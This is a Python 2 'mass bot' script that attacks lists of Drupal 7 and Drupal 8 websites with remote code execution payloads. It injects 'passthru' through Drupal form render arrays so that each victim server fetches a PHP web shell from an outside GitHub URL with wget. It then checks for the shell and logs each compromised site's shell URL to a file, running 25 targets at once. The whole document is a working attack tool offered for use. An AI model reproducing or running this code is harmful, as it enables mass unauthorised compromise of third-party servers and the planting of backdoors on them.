drupal exploite mass bot

1. import requests, sys, re, os
2. from time import time as timer
3. from multiprocessing.dummy import Pool as ThreadPool
4. from platform import system
5. from colorama import Fore                              
6. from colorama import Style                             
7. from pprint import pprint                              
8. from colorama import init                                              
9. init(autoreset=True)                                       
10. import time
11. ####### Colors   ######
12.    
13. fr  =   Fore.RED                                           
14. fc  =   Fore.CYAN                                          
15. fw  =   Fore.WHITE                                         
16. fg  =   Fore.GREEN                                         
17. sd  =   Style.DIM                                          
18. sn  =   Style.NORMAL                                       
19. sb  =   Style.BRIGHT                                       
20.  
21. #######################
22. # Coder Coded By The anvenger  #
23. #######################
24.  
25. try:
26.     with open(sys.argv[1], 'r') as f:
27.         woh = f.read().splitlines()
28. except IOError:
29.     pass
30. woh = list((woh))
31.  
32.  
33.  
34.  
35. class Drupal:
36.  
37.     def __init__(self):
38.    
39.         if system() == 'Linux':
40.             os.system('clear')
41.         if system() == 'Windows':
42.             os.system('cls')
43.        
44.             banner = """{}{} \n \n
45.  
46.  
47.  
48.        
49. _____ _                                                      
50. |_   _| |__   ___    __ _ _ ____   _____ _ __   __ _  ___ _ __
51.  | | | '_ \ / _ \ / _` | '_ \ \ / / _ \ '_ \ / _` |/ _ \ '__|
52.  | | | | | |  __/ | (_| | | | \ V /  __/ | | | (_| |  __/ |  
53.  |_| |_| |_|\GMR|  \__,_|_| |_|\_/ \___|_| |_|\__, |\___|_|  
54.                                               |___/                                                                
55.    
56.  
57.  
58.     Coded By: The anvenger ,
59.                                    
60.            
61.  
62.                 \n""".format(fc, sb)
63.        
64.             print banner
65.    
66.  
67.  
68.  
69.     def Drupal7(self, url):
70.  
71.  
72.  
73.         try:
74.  
75.             self.headers = {'User-Agent': 'Mozilla 5.0'}
76.  
77.  
78.             self.get_data = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':"wget https://raw.githubusercontent.com/Theanvenger/Tryag-File-Manager-jpeg/master/0up.php", 'name[#type]':'markup'}
79.  
80.             self.post_data = {'form_id':'user_pass', '_triggering_element_name':'name'}
81.  
82.             self.req_post = requests.post(url ,data=self.post_data, params=self.get_data, headers=self.headers)
83.  
84.             self.token = re.findall('name="form_build_id" value="(.*?)" />',self.req_post.content)
85.  
86.             self.get_input = {'q':'file/ajax/name/#value/' + self.token[0]}
87.  
88.             self.post_input = {'form_build_id':self.token[0]}
89.  
90.             self.lib_post = requests.post(url, data=self.post_input, params=self.get_input, headers=self.headers)
91.  
92.  
93.             self.uploading =  requests.get(url+"/d7.php", headers=self.headers)
94.  
95.  
96.             if 'The anvenger  HaCkEr' in self.uploading.content:
97.                 print '{}[Target]: {} {}    ====> {}{} Drupal (7)  {}{} eXploiting Done  '.format(sb, sd, url, fc,fc, sb,fg)
98.                 open('Drupal7_shells.txt', 'a').write(url+"/d7.php"+'\n')
99.                    
100.            
101.                    
102.             else:
103.                 print '{}[Target]: {} {}   ====> {}{}  Drupal (7)  {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)
104.                
105.                
106.  
107.  
108.  
109.  
110.  
111.         except:
112.             pass
113.  
114.  
115.  
116.     def Drupal8(self, url):
117.  
118.         try:
119.  
120.             self.headers = {'User-Agent': 'Mozilla 5.0'}
121.  
122.  
123.             self.post_datas  = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'passthru', 'mail[#type]': 'markup', 'mail[#markup]':"get https://raw.githubusercontent.com/Theanvenger/Tryag-File-Manager-jpeg/master/0up.php"}
124.  
125.  
126.             self.lib = requests.post(url + "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax", data=self.post_datas, headers=self.headers)
127.  
128.            
129.             self.uploadings =  requests.get(url+"/anvenger.php", headers=self.headers)
130.  
131.  
132.             if 'The anvenger  HaCkEr' in self.uploadings.content:
133.                 print '{}[Target]: {} {}    ====> {}{} Drupal (8)  {}{} eXploiting Done  '.format(sb, sd, url, fc,fc, sb,fg)
134.                 open('Drupal8_shells.txt', 'a').write(url+"/anvenger.php"+'\n')
135.                    
136.                    
137.             else:
138.                 print '{}[Target]: {} {}   ====> {}{}  Drupal (8)  {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)
139.  
140.  
141.  
142.  
143.  
144.  
145.         except:
146.             pass
147.  
148.  
149.  
150.  
151. try:
152.  
153.     xDrupal = Drupal()
154.  
155. except:
156.     pass
157.  
158.  
159.  
160.  
161. def Exploit(url):
162.  
163.     try:
164.         xDrupal.Drupal7(url)
165.         xDrupal.Drupal8(url)
166.  
167.     except:
168.         pass
169.  
170. def Main():
171.     try:
172.         start = timer()
173.         pp = ThreadPool(25)
174.         pr = pp.map(Exploit, woh)
175.         print('Time: ' + str(timer() - start) + ' seconds')
176.     except:
177.         pass
178.  
179.  
180. if __name__ == '__main__':
181.     Main()